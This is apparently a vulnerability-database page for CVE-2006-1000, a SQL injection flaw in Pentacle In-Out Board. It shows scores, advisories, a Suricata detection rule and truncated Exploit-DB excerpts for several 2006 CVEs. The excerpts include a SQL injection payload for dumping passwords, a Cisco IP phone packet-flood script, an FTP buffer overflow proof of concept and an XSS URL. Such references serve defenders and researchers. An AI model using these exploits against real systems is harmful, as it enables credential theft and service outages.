CVE-2006-1000
published 2006-03-06
CVE-2006-1000: Multiple SQL injection vulnerabilities in Pentacle In-Out Board 3.0 and earlier allow remote attackers to execute arbitrary SQL commands and bypass…
Priority P3 · 53 · critical · 10 CVSS 2.0
AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS
3.31%
87.0th percentile
Multiple SQL injection vulnerabilities in Pentacle In-Out Board 3.0 and earlier allow remote attackers to execute arbitrary SQL commands and bypass authentication via the (1) newsid parameter to newsdetailsview.asp and (2) password parameter to login.asp.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| g2soft | pentacle_in-out_board | — | — |
CVSS provenance
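| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vendor_redhat | — | 7.2 | HIGH | — |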
GHSA
GHSA-fhm3-h4q6-pq4x: Multiple SQL injection vulnerabilities in Pentacle In-Out Board 3
ghsa_unreviewed·2022-05-01
CVE-2006-1000 [HIGH] GHSA-fhm3-h4q6-pq4x: Multiple SQL injection vulnerabilities in Pentacle In-Out Board 3
Multiple SQL injection vulnerabilities in Pentacle In-Out Board 3.0 and earlier allow remote attackers to execute arbitrary SQL commands and bypass authentication via the (1) newsid parameter to newsdetailsview.asp and (2) password parameter to login.asp.
Red Hat
CVE-2006-6385: Stack-based buffer overflow in Intel PRO 10/100, PRO/1000, and PRO/10GbE PCI, PCI-X, and PCIe network adapter drivers (aka NDIS miniport drivers) befo
vendor_redhat·CVSS 7.2
CVE-2006-6385 [HIGH] CVE-2006-6385: Stack-based buffer overflow in Intel PRO 10/100, PRO/1000, and PRO/10GbE PCI, PCI-X, and PCIe network adapter drivers (aka NDIS miniport drivers) befo
Stack-based buffer overflow in Intel PRO 10/100, PRO/1000, and PRO/10GbE PCI, PCI-X, and PCIe network adapter drivers (aka NDIS miniport drivers) before 20061205 allows local users to execute arbitrary code with "kernel-level" privileges via an incorrect function call in certain OID handlers.
Statement: Not Vulnerable. eEye Research advisory AD20061207 (Intel Network Adapter Driver Local Privilege Escalation) describes a flaw in the Linux Kernel drivers for the e100, e1000, and ixgb Intel network cards. The flaw affects the NDIS miniport drivers and its OID support. The Linux Kernel drivers do not support the NDIS API and the OID concept from Microsoft Windows.
Suricata
GPL VOIP EXPLOIT SIP UDP Softphone overflow attempt
suricata·2010-09-23
CVE-2006-0189 GPL VOIP EXPLOIT SIP UDP Softphone overflow attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET 5060 (msg:"GPL VOIP EXPLOIT SIP UDP Softphone overflow attempt"; content:"|3B|branch|3D|"; content:"a|3D|"; pcre:"/^a\x3D[^\n]{1000,}/smi"; reference:bugtraq,16213; reference:cve,2006-0189; classtype:misc-attack; sid:2100223; rev:2; metadata:created_at 2010_09_23, cve CVE_2006_0189, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Exploit-DB
Durian Web Application Server 3.02 - Denial of Service
exploitdb·2006-12-29
CVE-2006-6853 Durian Web Application Server 3.02 - Denial of Service
---
http://sourceforge.net/projects/durian/
//by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org
error_reporting(E_ALL);
$service_port = "4002";
$address = "192.168.1.3";
$ch =array("\xaa","\xa0","\x41");
$size=array(30,70,150,330,520,700,1400,2300);
$c=1000;
for ($m=1; $m
# milw0rm.com [2006-12-29]
Exploit-DB
AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow
exploitdb·2006-12-19
CVE-2006-6665 AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow
---
/*
[i] Title: DeepBurner
#include
#include
#include
// Exploit internals, change only if you know what you are doing
#define BUFFSIZE 1000
//
Exploit-DB
PHP League 0.82 - 'classement.php' SQL Injection
exploitdb·2006-10-27
CVE-2006-5676 PHP League 0.82 - 'classement.php' SQL Injection
---
exploit2.asp
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
'[Using : Write Target and ID after Submit Click
'===============================================================================================
%>
Php League v0.82 (classement.php) Remote SQL Injection Exploit
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
Php Leaguev0.82 (classement.p
Exploit-DB
KMail 1.x - HTML Element Handling Denial of Service
exploitdb·2006-10-16
CVE-2006-7139 KMail 1.x - HTML Element Handling Denial of Service
---
source: https://www.securityfocus.com/bid/20539/info
KMail is prone to an unspecified denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
KMail 1.9.1 and prior versions are vulnerable to this issue.
Return-Path:
X-Original-To: test
Delivered-To: test@torvalds
Received: by torvalds (Postfix, from userid 1000)
id D854F83BF5; Tue, 26 Sep 2006 16:06:36 +0100 (IST)
To: test@torvalds
Content-Type: text/html
Subject: testing
Message-Id:
Date: Tue, 26 Sep 2006 16:06:36 +0100 (IST)
From: nnp@torvalds (nnp)
Status: R
X-Status: NC
X-KMail-EncryptionState:
X-KMail-SignatureState:
X-KMail-MDN-Sent:
Exploit-DB
BomberClone 0.11 - Multiple Vulnerabilities
exploitdb·2006-07-31
CVE-2006-4006 BomberClone 0.11 - Multiple Vulnerabilities
---
// source: https://www.securityfocus.com/bid/19255/info
Bomberclone is prone to remote information-disclosure and denial-of-service vulnerabilities because it fails to properly sanitize user-supplied input.
These issues allow remote attackers to access sensitive information and to crash the application, denying further service to legitimate users.
Version 0.11.6 is reported vulnerable; other versions may also be affected.
/*
by Luigi Auriemma
*/
#include
#include
#include
#include
#include
#include "show_dump.h"
#ifdef WIN32
#include
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include
#include
#include
#include
#include
#include
#define ONESEC 1
#endif
#define VER "0.1"
#define PO
Exploit-DB
Golden FTP Server Pro 2.70 - 'APPE' Remote Buffer Overflow (PoC)
exploitdb·2006-05-03
CVE-2006-2180 Golden FTP Server Pro 2.70 - 'APPE' Remote Buffer Overflow (PoC)
---
#!/usr/bin/perl
#
# Golden FTP Server Pro 2.70 Remote APPE command PoC exploit : DoS
# /JA
# https://www.securinfos.info
#
use Net::FTP;
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];
if (($host) && ($port)) {
# Exploit string (try with a different value if needed)
$exploit_string = "./A" x 1000;
print "Trying to connect to $host:$port\n";
$sock = Net::FTP->new("$host",Port => $port, TimeOut => 60, Debug=> $debug) or die "[-] Connection failed\n";
print "[+] Connect OK!\n";
print "Logging...\n";
if (!$user) {
$user = "test";
$pass = "test";
}
$sock->login($user, $pass);
sleep(1);
$answer = $sock->message;
print $answer ."\n";
print "Sending string...\n";
$sock->quot("APP
Exploit-DB
ENet - Multiple Denial of Service Vulnerabilities
exploitdb·2006-03-13
CVE-2006-1194 ENet - Multiple Denial of Service Vulnerabilities
---
// source: https://www.securityfocus.com/bid/17087/info
ENet is prone to multiple denial-of-service vulnerabilities. A remote attacker can send specifically crafted data to trigger these flaws, leading to a denial-of-service condition.
/*
by Luigi Auriemma
*/
#include
#include
#include
#include
#include "enet_protocol.h"
#ifdef WIN32
#include
#include "winerr.h"
#define close closesocket
#define ONESEC 1000
#define MYRAND clock()
#else
#include
#include
#include
#include
#include
#include
#include
#define ONESEC 1
#define MYRAND times(0)
#define strnicmp strncasecmp
#endif
#define VER "0.1"
u_int get_num(u_char *str);
int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err);
int timeout(int sock);
u_int
Exploit-DB
Woltlab Burning Board 1.1.1/2.x - 'galerie_onfly.php' Cross-Site Scripting
exploitdb·2006-02-27
CVE-2006-1034 Woltlab Burning Board 1.1.1/2.x - 'galerie_onfly.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/16843/info
Woltlab Burning Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/21new/galerie_data/galerie_onfly.php?abild=9997_mr2_2f2f_blue.jpg&width=600&show=2&inpic=Patriotic%20Hackers%20:=))&col=50&size=10&left=1000&height=100&vert=0&inpic2=Patriotic%20Hackers&nocomp=0
Exploit-DB
Pentacle In-Out Board 6.03 - 'newsdetailsview' SQL Injection
exploitdb·2006-02-25
CVE-2006-1000 Pentacle In-Out Board 6.03 - 'newsdetailsview' SQL Injection
---
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
#Usage: penta.pl
#Original Advisory: http://www.nukedx.com/?viewdoc=14
use IO::Socket;
if(@ARGV +
+ Example: penta.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx +
+***********************************************************************+
";
exit();
}
#Local variables
$pentaserver = $ARGV[0];
$pentaserver =~ s/(http:\/\/)//eg;
$pentahost = "http://".$pentaserver;
$port = "80";
$pentadir = $ARGV[1];
$pentaid = $ARGV[2];
$pentatar = "newsdetailsview.asp?newsid=";
$pentafinal = "login.asp";
$pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20u
Exploit-DB
Cisco IP Phone 7940 - Reboot (Denial of Service)
exploitdb·2006-01-10
CVE-2006-0179 Cisco IP Phone 7940 - Reboot (Denial of Service)
---
#!/usr/bin/perl
# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my
# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
# protocol - this is not for the SIP firmware.
use Net::RawIP;
use Time::HiRes;
$pkt = new Net::RawIP;
die "Usage $0 " unless ($ARGV[4]);
$pkt->set({
ip => {
saddr => $ARGV[0],
daddr => $ARGV[1]
},
tcp=> { dest => $ARGV[2],
syn => 1,
seq => 0,
ack => 0}
});
for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; };
# milw0rm.com [2006-01-10]
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042524.html
http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042525.html
http://secunia.com/advisories/19024
http://securitytracker.com/id?1015682
http://www.nukedx.com/?viewdoc=13
http://www.nukedx.com/?viewdoc=14
http://www.securityfocus.com/archive/1/426074/100/0/threaded
http://www.securityfocus.com/archive/1/426075/100/0/threaded
http://www.securityfocus.com/bid/16818
http://www.vupen.com/english/advisories/2006/0749
2006-03-06
Published